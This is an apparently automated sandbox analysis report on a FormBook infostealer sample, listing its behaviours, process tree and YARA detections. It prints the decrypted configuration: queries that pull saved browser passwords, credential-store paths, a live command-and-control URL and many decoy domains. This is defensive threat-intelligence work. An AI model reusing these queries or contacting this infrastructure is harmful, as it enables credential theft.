Play interactive tour

Edit tour

Analysis Report 4NoiNHCNoU.exe

Overview

General Information

Sample Name:	4NoiNHCNoU.exe
Analysis ID:	344528
MD5:	204e0bf841b9900fa03d6dff302857f3
SHA1:	a3b3152dbea14ed71a5e226a123433dfc3ecb60a
SHA256:	2ba9185ecb7b43e54242e560724993fbf5e24c3e1acd57889ac9dc305e934045
Tags:	exe
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Allocates memory in foreign processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to launch a process as a different user

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

4NoiNHCNoU.exe (PID: 6340 cmdline: 'C:\Users\user\Desktop\4NoiNHCNoU.exe' MD5: 204E0BF841B9900FA03D6DFF302857F3)

AddInProcess32.exe (PID: 6436 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autoconv.exe (PID: 5752 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)

help.exe (PID: 6840 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)

cmd.exe (PID: 6768 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bbc", "KEY1_OFFSET 0x1d6b1", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1d7b6", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1c363", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9d07c71e", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f716fd2", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014b5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "gcdragons.com", "gfdfraveis.xyz", "diorcve.com", "souqmar.info", "websiteinawknd.com", "esmartdubai.com", "ctyjg.com", "monalizacos.com", "motherkidsonline.com", "allpackedup.com", "dl-dianshi.com", "cobourgautoglass.com", "goldenhourcpr.com", "dominantreplacement.com", "psicologiabenavet.com", "laxvestcapital.com", "konsultan-kesehatan.com", "hudsonhoodle.com", "zolarcrm.com", "sorbolento.com", "hull3dprints.com", "inclusivevc.com", "work-yourway.com", "cheekypundit.com", "dokhithai.xyz", "kbsp.site", "crysalisuk.com", "atlantamars.com", "poklonnaya7.com", "spider-manshopping.com", "ponyimage.com", "loveitfactor.com", "southaustinbullionexchange.com", "bestloveshayarihindi.com", "bastienandtaly.com", "rangers3.xyz", "living-story.com", "milkandmemories.com", "finddealercars.com", "northernsourcer.com", "desolaluna.com", "goodthingtoday.com", "tatepasini.com", "itsbrodee.com", "finecutbutcher.com", "noodlenoggins.com", "cookiefoo.com", "gafademoda.com", "dandysoftgames.com", "katysteakhouse.com", "doblatumonto.com", "7225662.com", "qbbkk.com", "haofeel.com", "barefootentertainmenthi.com", "scotrianbank.com", "makwarthgamer.com", "dataintegrityindia.com", "yaseneva.com", "thepopindia.com", "eshtemca.com", "pingpongforlife.com", "golfbet247.com", "leesungroadmarking.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.artdonline.com/wdva/\u0000"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xbf9d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xbfc3c:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xed2b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xed51c:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11ab82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11adec:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xcb75f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf903f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12690f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xcb24b:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf8b2b:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1263fb:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xcb861:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf9141:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x126a11:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xcb9d9:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xf92b9:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x126b89:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xc0654:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xedf34:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11b804:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xce4f3:$sqlite3step: 68 34 1C 7B E1 0xce606:$sqlite3step: 68 34 1C 7B E1 0xfbdd3:$sqlite3step: 68 34 1C 7B E1 0xfbee6:$sqlite3step: 68 34 1C 7B E1 0x1296a3:$sqlite3step: 68 34 1C 7B E1 0x1297b6:$sqlite3step: 68 34 1C 7B E1 0xce522:$sqlite3text: 68 38 2A 90 C5 0xce647:$sqlite3text: 68 38 2A 90 C5 0xfbe02:$sqlite3text: 68 38 2A 90 C5 0xfbf27:$sqlite3text: 68 38 2A 90 C5 0x1296d2:$sqlite3text: 68 38 2A 90 C5 0x1297f7:$sqlite3text: 68 38 2A 90 C5 0xce535:$sqlite3blob: 68 53 D8 7F 8C 0xce65d:$sqlite3blob: 68 53 D8 7F 8C 0xfbe15:$sqlite3blob: 68 53 D8 7F 8C 0xfbf3d:$sqlite3blob: 68 53 D8 7F 8C 0x1296e5:$sqlite3blob: 68 53 D8 7F 8C 0x12980d:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9d02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9f6c:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x375c0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3782a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x64200:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6446a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15a8f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4334d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x6ff8d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1557b:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x42e39:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6fa79:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15b91:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x4344f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7008f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15d09:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x435c7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x70207:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa984:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x38242:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x64e82:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18823:$sqlite3step: 68 34 1C 7B E1 0x18936:$sqlite3step: 68 34 1C 7B E1 0x460e1:$sqlite3step: 68 34 1C 7B E1 0x461f4:$sqlite3step: 68 34 1C 7B E1 0x72d21:$sqlite3step: 68 34 1C 7B E1 0x72e34:$sqlite3step: 68 34 1C 7B E1 0x18852:$sqlite3text: 68 38 2A 90 C5 0x18977:$sqlite3text: 68 38 2A 90 C5 0x46110:$sqlite3text: 68 38 2A 90 C5 0x46235:$sqlite3text: 68 38 2A 90 C5 0x72d50:$sqlite3text: 68 38 2A 90 C5 0x72e75:$sqlite3text: 68 38 2A 90 C5 0x18865:$sqlite3blob: 68 53 D8 7F 8C 0x1898d:$sqlite3blob: 68 53 D8 7F 8C 0x46123:$sqlite3blob: 68 53 D8 7F 8C 0x4624b:$sqlite3blob: 68 53 D8 7F 8C 0x72d63:$sqlite3blob: 68 53 D8 7F 8C 0x72e8b:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.AddInProcess32.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.AddInProcess32.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
2.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.AddInProcess32.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.AddInProcess32.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.2.AddInProcess32.exe.400000.0.unpack

